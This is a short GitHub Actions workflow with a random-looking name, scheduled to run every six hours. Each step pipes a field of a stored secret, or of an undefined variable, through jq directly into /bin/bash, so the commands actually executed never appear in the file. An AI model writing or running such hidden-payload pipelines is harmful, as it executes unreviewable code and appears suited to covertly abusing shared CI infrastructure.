name: yanshanxi4376
on:
  workflow_dispatch:
  schedule:
    - cron: '1 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yanshanxi4376
        env:
          dy59: ${{ secrets.dy59 }}
        run: |
          echo $dy59 | jq -r .jqczh064 | /bin/bash
          echo $l96 | jq -r .jcr7706 | /bin/bash
          echo $duvyp2 | jq -r .bpg09 | /bin/bash
          echo $s34100 | jq -r .golnl0 | /bin/bash
          echo $ode5425 | jq -r .qme1049 | /bin/bash
          echo $hzezo6070 | jq -r .smgb15983 | /bin/bash
          echo $czsnu4635 | jq -r .ruu162 | /bin/bash
          echo $fydm65763 | jq -r .wry0 | /bin/bash

